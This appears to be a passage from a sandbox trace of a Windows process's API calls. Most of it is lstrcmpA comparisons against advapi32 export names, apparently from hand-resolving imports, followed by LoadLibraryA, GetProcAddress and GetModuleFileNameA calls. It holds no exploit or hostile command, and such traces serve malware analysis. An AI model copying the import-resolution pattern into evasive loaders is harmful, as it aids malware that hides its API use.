lpString2="A_SHAFinal") returned 1 [0124.339] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0124.339] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0124.339] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0124.339] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0124.339] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0124.340] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0124.340] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0124.341] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.343] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.344] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0124.345] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.346] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.346] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0124.347] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0124.348] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.349] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0124.350] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0124.351] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0124.351] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0124.351] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0124.351] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0124.351] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0124.351] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0124.351] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0125.435] GetProcessHeap () returned 0x530000 [0125.436] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x530000) returned 1 [0125.443] GetProcessHeap () returned 0x530000 [0125.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549240 [0125.444] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0125.444] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0125.444] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0125.444] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 